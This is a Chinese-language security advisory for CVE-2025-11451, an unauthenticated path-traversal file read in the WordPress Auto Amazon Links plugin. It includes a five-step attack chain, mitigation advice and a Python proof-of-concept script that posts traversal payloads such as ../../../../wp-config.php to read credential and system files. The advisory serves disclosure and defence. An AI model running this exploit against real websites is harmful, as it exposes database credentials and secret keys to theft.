CVE-2025-11451 WordPress Amazon Auto Links插件任意文件读取漏洞

漏洞信息

漏洞编号

CVE-2025-11451

漏洞类型

任意文件读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Auto Amazon Links – Amazon Associates Affiliate Plugin

漏洞概述

CVE-2025-11451是WordPress插件Auto Amazon Links（Amazon Associates Affiliate Plugin）中的一个高危安全漏洞。该漏洞存在于插件的REST API端点'/wp-json/wp/v2/aal_ajax_unit_loading'中，攻击者无需任何认证即可利用此漏洞读取服务器上的任意文件内容。由于该插件被广泛应用于WordPress网站以实现亚马逊联盟营销功能，因此受影响的网站数量可能相当可观。攻击者通过构造特殊的请求，可以遍历服务器文件系统，读取敏感配置文件、数据库凭证、其他插件和主题的源代码等敏感信息。这些信息可能被用于进一步的攻击，如横向移动、权限提升或数据窃取。该漏洞的CVSS评分为7.5，属于高危级别，机密性影响为高，但完整性和可用性影响为无。

技术细节

该漏洞的根本原因在于Amazon Auto Links插件在处理REST API请求时，未对用户输入的文件路径进行充分的验证和过滤。攻击者可以通过wp-json/wp/v2/aal_ajax_unit_loading端点，传递特定的参数来指定想要读取的目标文件路径。由于插件直接使用用户可控的输入来构造文件读取操作，导致路径遍历漏洞。攻击者可以使用相对路径（如../../../../）或绝对路径来指定目标文件。在技术实现上，插件的AmazonAutoLinks_UnitOutput__TemplatePath.php和AmazonAutoLinks_UnitOutput_Base.php文件中的代码存在缺陷，未实施适当的访问控制检查。攻击者可以利用WordPress REST API的标准请求格式，绕过常规的WordPress权限检查机制，因为REST API端点通常对认证要求的处理方式与传统的admin-ajax.php不同。成功利用此漏洞可以读取wp-config.php、.htpasswd、/etc/passwd等敏感文件内容。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先确认目标网站使用WordPress，并安装有Amazon Auto Links插件版本<=5.4.3。通过检查wp-json/wp/v2/aal_ajax_unit_loading端点是否存在来验证漏洞可利用性。

STEP 2

步骤2: 构造恶意请求

攻击者构造针对REST API端点/wp-json/wp/v2/aal_ajax_unit_loading的HTTP POST请求，在请求体中注入目标文件路径（如../../../../wp-config.php），利用路径遍历技术访问服务器敏感文件。

STEP 3

步骤3: 发送攻击载荷

攻击者发送构造好的请求，由于该端点无需认证即可访问，请求将直接到达插件的处理逻辑。插件代码未对file_path参数进行安全验证，直接使用该参数读取文件内容。

STEP 4

步骤4: 获取敏感信息

服务器将目标文件的内容作为响应返回。攻击者获取wp-config.php等文件内容后，可提取数据库凭证、API密钥、认证盐值等敏感信息。

STEP 5

步骤5: 横向移动或进一步利用

利用获取的凭证，攻击者可以连接数据库、访问其他系统或进行更深层次的入侵。例如，可能利用数据库凭证进一步获取管理员账户密码哈希或修改网站内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

def exploit_cve_2025_11451(target_url, file_path):
    """
    CVE-2025-11451 - Arbitrary File Read in Amazon Auto Links Plugin
    Target: /wp-json/wp/v2/aal_ajax_unit_loading
    """
    # Construct the vulnerable endpoint
    endpoint = f"{target_url}/wp-json/wp/v2/aal_ajax_unit_loading"
    
    # Prepare the payload with file path traversal
    payload = {
        'aal_action': 'load_template',
        'file_path': file_path,  # e.g., ../../../../wp-config.php
        'nonce': ''
    }
    
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    
    try:
        print(f"[*] Target: {target_url}")
        print(f"[*] Attempting to read: {file_path}")
        
        # Send POST request to REST API endpoint
        response = requests.post(endpoint, json=payload, headers=headers, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Request successful!")
            print(f"[+] Response:")
            print(response.text)
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <file_path>")
        print(f"Example: python {sys.argv[0]} http://example.com ../../../../wp-config.php")
        sys.exit(1)
    
    target = sys.argv[1]
    filepath = sys.argv[2]
    exploit_cve_2025_11451(target, filepath)

影响范围

Auto Amazon Links plugin <= 5.4.3 (所有版本)

防御指南

临时缓解措施

在官方安全更新发布之前，可采取以下临时缓解措施：1) 使用Web应用防火墙阻断对wp-json端点的未授权访问；2) 临时禁用或限制Amazon Auto Links插件的功能；3) 实施基于IP的访问控制限制；4) 启用WordPress的REST API访问限制插件；5) 监控系统日志，警惕异常的API请求模式。建议优先进行版本升级，因为临时缓解措施可能影响插件的正常功能。